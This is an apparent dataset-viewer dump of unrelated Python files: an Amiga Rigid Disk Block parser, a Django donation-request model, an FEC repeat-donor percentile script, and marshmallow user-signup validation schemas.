self.interleave = blk._get_long(19)
self.parking_zone = blk._get_long(20)
self.write_pre_comp = blk._get_long(24)
self.reduced_write = blk._get_long(25)
self.step_rate = blk._get_long(26)
def write(self, blk):
blk._put_long(16, self.cyls)
blk._put_long(17, self.secs)
blk._put_long(18, self.heads)
blk._put_long(19, self.interleave)
blk._put_long(20, self.parking_zone)
blk._put_long(24, self.write_pre_comp)
blk._put_long(25, self.reduced_write)
blk._put_long(26, self.step_rate)
class RDBLogicalDrive:
def __init__(self, rdb_blk_lo=0, rdb_blk_hi=0, lo_cyl=0, hi_cyl=0,
cyl_blks=0, high_rdsk_blk=0, auto_park_secs=0):
self.rdb_blk_lo = rdb_blk_lo
self.rdb_blk_hi = rdb_blk_hi
self.lo_cyl = lo_cyl
self.hi_cyl = hi_cyl
self.cyl_blks = cyl_blks
self.high_rdsk_blk = high_rdsk_blk
self.auto_park_secs = auto_park_secs
def dump(self):
print("LogicalDrive")
print(" rdb_blk_lo: %d" % self.rdb_blk_lo)
print(" rdb_blk_hi: %d" % self.rdb_blk_hi)
print(" lo_cyl: %d" % self.lo_cyl)
print(" hi_cyl: %d" % self.hi_cyl)
print(" cyl_blks: %d" % self.cyl_blks)
print(" high_rdsk_blk: %d" % self.high_rdsk_blk)
print(" auto_park_secs: %d" % self.auto_park_secs)
def read(self, blk):
self.rdb_blk_lo = blk._get_long(32)
self.rdb_blk_hi = blk._get_long(33)
self.lo_cyl = blk._get_long(34)
self.hi_cyl = blk._get_long(35)
self.cyl_blks = blk._get_long(36)
self.auto_park_secs = blk._get_long(37)
self.high_rdsk_blk = blk._get_long(38)
def write(self, blk):
blk._put_long(32, self.rdb_blk_lo)
blk._put_long(33, self.rdb_blk_hi)
blk._put_long(34, self.lo_cyl)
blk._put_long(35, self.hi_cyl)
blk._put_long(36, self.cyl_blks)
blk._put_long(37, self.auto_park_secs)
blk._put_long(38, self.high_rdsk_blk)
class RDBDriveID:
def __init__(self, disk_vendor="", disk_product="", disk_revision="",
ctrl_vendor="", ctrl_product="", ctrl_revision=""):
self.disk_vendor = disk_vendor
self.disk_product = disk_product
self.disk_revision = disk_revision
self.ctrl_vendor = ctrl_vendor
self.ctrl_product = ctrl_product
self.ctrl_revision = ctrl_revision
def dump(self):
print("DriveID")
print(" disk_vendor: '%s'" % self.disk_vendor)
print(" disk_product: '%s'" % self.disk_product)
print(" disk_revision: '%s'" % self.disk_revision)
print(" ctrl_vendor: '%s'" % self.ctrl_vendor)
print(" ctrl_product: '%s'" % self.ctrl_product)
print(" ctrl_revision: '%s'" % self.ctrl_revision)
def read(self, blk):
self.disk_vendor = blk._get_cstr(40, 8)
self.disk_product = blk._get_cstr(42, 16)
self.disk_revision = blk._get_cstr(46, 4)
self.ctrl_vendor = blk._get_cstr(47, 8)
self.ctrl_product = blk._get_cstr(49, 16)
self.ctrl_revision = blk._get_cstr(53, 4)
def write(self, blk):
blk._put_cstr(40, 8, self.disk_vendor)
blk._put_cstr(42, 16, self.disk_product)
blk._put_cstr(46, 4, self.disk_revision)
blk._put_cstr(47, 8, self.ctrl_vendor)
blk._put_cstr(49, 16, self.ctrl_product)
blk._put_cstr(53, 4, self.ctrl_revision)
class RDBlock(Block):
def __init__(self, blkdev, blk_num=0):
Block.__init__(self, blkdev, blk_num, chk_loc=2, is_type=Block.RDSK)
def create(self, phy_drv, log_drv, drv_id,
host_id=7, block_size=512, flags=0x17,
badblk_list=Block.no_blk, part_list=Block.no_blk, fs_list=Block.no_blk, init_code=Block.no_blk,
size=64):
Block.create(self)
self.size = size
self.host_id = host_id
self.block_size = block_size
self.flags = flags
self.badblk_list = badblk_list
self.part_list = part_list
self.fs_list = fs_list
self.init_code = init_code
self.phy_drv = phy_drv
self.log_drv = log_drv
self.drv_id = drv_id
self.valid = True
def write(self):
self._create_data()
self._put_long(1, self.size)
self._put_long(3, self.host_id)
self._put_long(4, self.block_size)
self._put_long(5, self.flags)
self._put_long(6, self.badblk_list)
self._put_long(7, self.part_list)
self._put_long(8, self.fs_list)
self._put_long(9, self.init_code)
self.phy_drv.write(self)
self.log_drv.write(self)
self.drv_id.write(self)
Block.write(self)
def read(self):
Block.read(self)
if not self.valid:
return False
self.size = self._get_long(1)
self.host_id = self._get_long(3)
self.block_size = self._get_long(4)
self.flags = self._get_long(5)
self.badblk_list = self._get_long(6)
self.part_list = self._get_long(7)
self.fs_list = self._get_long(8)
self.init_code = self._get_long(9)
self.phy_drv = RDBPhysicalDrive()
self.phy_drv.read(self)
self.log_drv = RDBLogicalDrive()
self.log_drv.read(self)
self.drv_id = RDBDriveID()
self.drv_id.read(self)
return self.valid
def dump(self):
Block.dump(self, "RigidDisk")
print(" size: %d" % self.size)
print(" host_id: %d" % self.host_id)
print(" block_size: %d" % self.block_size)
print(" flags: 0x%08x" % self.flags)
print(" badblk_list: %s" % self._dump_ptr(self.badblk_list))
print(" part_list: %s" % self._dump_ptr(self.part_list))
print(" fs_list: %s" % self._dump_ptr(self.fs_list))
print(" init_code: %s" % self._dump_ptr(self.init_code))
self.phy_drv.dump()
self.log_drv.dump()
self.drv_id.dump()
|
10,597 | b94be32071c1444c7b14f38907642679b9eb14cf | from django.db import models
class Donationreqs(models.Model):
user_id = models.IntegerField()
volunteer_id = models.IntegerField(blank=True, null=True)
status = models.IntegerField()
mobile = models.CharField(db_column='Mobile', max_length=100, blank=True, null=True) # Field name made lowercase.
address = models.TextField()
landmark = models.CharField(db_column='Landmark', max_length=225, blank=True, null=True) # Field name made lowercase.
country = models.CharField(max_length=50)
state = models.CharField(max_length=200, blank=True, null=True)
city = models.CharField(max_length=225)
zipcode = models.IntegerField()
no_of_book = models.IntegerField()
no_of_cartons = models.IntegerField()
app_books_weight = models.IntegerField()
donated_book_category = models.CharField(max_length=255)
how_do_u_know_abt_us = models.CharField(max_length=225)
wastage = models.IntegerField()
document_mail_sent = models.CharField(max_length=1)
is_blocked = models.CharField(max_length=1)
i_date = models.IntegerField()
u_date = models.IntegerField(blank=True, null=True)
is_paid_donation = models.CharField(max_length=1)
donor_name = models.CharField(max_length=45, blank=True, null=True)
pickup_date_time = models.CharField(max_length=255, blank=True, null=True)
class Meta:
managed = True
db_table = 'donationreqs'
|
10,598 | 9994a6fb04188d0d44833f2155fc64028e9af756 | import os
import argparse
import datetime
import math
import heapq
def get_filepaths():
'''
Reads command line argument for input/output filepaths
Parameters:
None
Returns:
input filepath (string)
output filepath (string)
percentile filepath (string)
'''
parser = argparse.ArgumentParser()
parser.add_argument('itcont')
parser.add_argument('percentile')
parser.add_argument('output')
args = parser.parse_args()
return args.itcont, args.output, args.percentile
def parse_itcont(itcont_raw):
'''
Parses each line of itcont.txt and returns useful information
Raises ValueError if data is malformed
Parameters:
itcont_raw (string): raw input line from itcont.txt
Returns:
cmtd_id (string)
name (string)
zip_code (string)
year (int)
trans_amount (float)
'''
itcont = itcont_raw.split('|')
if itcont[15]:
raise ValueError('OTHER_ID field contains value')
cmtd_id = itcont[0]
name = itcont[7]
year = get_year(itcont[13])
zip_code = get_zip_code(itcont[10])
try:
trans_amount = int(round(float(itcont[14])))
except:
raise ValueError('Transaction Amount is malformed')
if not cmtd_id:
raise ValueError('CMTD ID field does not contain any value')
if not name:
raise ValueError('Name field does not contain any value')
return cmtd_id, name, zip_code, year, trans_amount
def get_zip_code(zip_code):
'''
Verifies if zip code has more than 5 digits and returns the 5-digit zip code
Raises ValueError if zip_code is malformed
Parameters:
zip_code (string): raw string of zip code from itcont.txt
Return:
5-digit zip code (string)
'''
if (len(zip_code) < 5) or (not zip_code.isdigit()):
raise ValueError('Invalid zip code')
else:
return zip_code[0:5]
def get_year(date):
'''
Verifies if date is well-formed and returns the year
Raises ValueError if date is malformed
Parameters:
date (string): raw string of date from itcont.txt
Returns:
year (int)
'''
try:
month = date[0:2]
day = date[2:4]
year = date[4:8]
date = datetime.datetime(year = int(year), month = int(month), day = int(day))
return date.year
except (ValueError, IndexError):
raise ValueError('Invalid transaction date')
def update_repeat_donation(percentile, repeat_donation, trans_amount):
'''
Updates information about contributions received by recipient from the
contributor's zip code streamed in so far in this calendar year
and computes donation amount in a given percentile using the nearest-rank method
Parameters:
percentile (float): percentile to compute
repeat_donation (dict): { 'total_amount': total amount of contributions from repeat donors (float),
'num_trans': total number of transactions from repeat donors (int),
'max_heap': contains the smallest n% of transaction amounts (heapq)
i.e.: largest value in max_heap is n-th percentile value
'min_heap': contains the rest of the transaction amounts (heapq) }
trans_amount (float): transaction amount of new contribution from a repeat donor
Returns:
None
'''
repeat_donation['total_amount'] += trans_amount
repeat_donation['num_trans'] += 1
# computes the ordinal rank of n-th percentile value
ordinal_rank = int( math.ceil(percentile/100. * repeat_donation['num_trans'] ) )
max_heap = repeat_donation['max_heap']
min_heap = repeat_donation['min_heap']
if(trans_amount <= -(max_heap[0])):
heapq.heappush(max_heap, -trans_amount)
else:
heapq.heappush(min_heap, trans_amount)
if(len(max_heap) > ordinal_rank): # max_heap contains more than n% of elements
temp = -heapq.heappop(max_heap) # removes the largest value in max_heap and adds to min_heap
heapq.heappush(min_heap, temp)
if(len(max_heap) < ordinal_rank): # max_heap contains fewer than n% of elements
temp = heapq.heappop(min_heap) # removes the smallest value in min_heap and adds to max_heap
heapq.heappush(max_heap, -temp)
def get_repeat_donation_stats(repeat_donation):
'''
Returns repeat donation statistics for output
Parameters:
repeat_donation (dict): { 'total_amount': total amount of contributions from repeat donors (float),
'num_trans': total number of transactions from repeat donors (int),
'max_heap': contains the smallest n% of transaction amounts (heapq)
i.e.: largest value in max_heap is n-th percentile value
'min_heap': contains the rest of the transaction amounts (heapq) }
Returns:
total contribution amount (int)
total number of transactions (int)
percentile value (int)
'''
total_amount = repeat_donation['total_amount']
number_of_transactions = repeat_donation['num_trans']
percentile_value = -(repeat_donation['max_heap'][0]) # largest value in max_heap is the n-th percentile value
return total_amount, number_of_transactions, percentile_value
if __name__ == "__main__":
itcont_filepath, output_filepath, percentile_filepath = get_filepaths()
with open(percentile_filepath) as f:
percentile = float(f.readline())
repeat_donors_dict = {} # key: (name, zip_code); value: year of contribution.
repeat_donations_dict = {} # key: (cmtd_id, zip_code, year); value: contribution info
start_time = datetime.datetime.now()
with open(itcont_filepath, 'r') as input_file, open(output_filepath, 'w') as output_file:
itcont_raw = input_file.readline()
while(itcont_raw): # if new line of itcont.txt is not empty
try:
cmtd_id, name, zip_code, year, amount = parse_itcont(itcont_raw)
if (name, zip_code) in repeat_donors_dict: # this donor is a repeated donor
if year >= repeat_donors_dict[(name, zip_code)]: # skips the record if transaction date is for a previous calendar year
if (cmtd_id, zip_code, year) in repeat_donations_dict:
update_repeat_donation(percentile, repeat_donations_dict[(cmtd_id, zip_code, year)], amount)
else:
# creates a new repeat donation record
max_heap = [-amount] # uses the negative value because heapq only supports min-heap.
min_heap = []
heapq.heapify(max_heap)
heapq.heapify(min_heap)
repeat_donations_dict[(cmtd_id, zip_code, year)] = {'max_heap': max_heap,
'min_heap': min_heap,
'total_amount':amount,
'num_trans': 1}
total_amount, number_of_transactions, percentile_value \
= get_repeat_donation_stats(repeat_donations_dict[(cmtd_id, zip_code, year)])
# Writes to output file
output_file.write('{}|{}|{}|{}|{}|{}\n'.format(cmtd_id, zip_code, year,
percentile_value, total_amount, number_of_transactions))
else:
# adds donor to repeat_donors_dict
repeat_donors_dict[(name, zip_code)] = year
except ValueError: # If record is malformed, ignore and skip the record
pass
itcont_raw = input_file.readline() # reads new line from itcont.txt
print'run time: ', datetime.datetime.now() - start_time
|
10,599 | a27e70dc501ab0beba958fb665736edc3a967293 | """
User validation schemas.
"""
from marshmallow import pre_load, Schema, validates_schema, ValidationError
from marshmallow.fields import Bool, Email, Str
from marshmallow.validate import Length
class BasicUserSchema(Schema):
email = Email(required=True)
first_name = Str(required=True, validate=Length(max=100))
last_name = Str(required=True, validate=Length(max=100))
@pre_load
def make_data(self, data, **kwargs):
data['email'] = data.pop('email').lower().strip()
data['first_name'] = data.pop('first_name').strip()
data['last_name'] = data.pop('last_name').strip()
return data
class UserCreateSchema(BasicUserSchema):
password = Str(required=True, validate=Length(min=8))
confirm_password = Str(required=True, validate=Length(min=8))
@validates_schema
def validates_password_confirmation(self, data, **kwargs):
if data['password'] != data['confirm_password']:
raise ValidationError(confirm_password='Passwords didn\'t match')
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.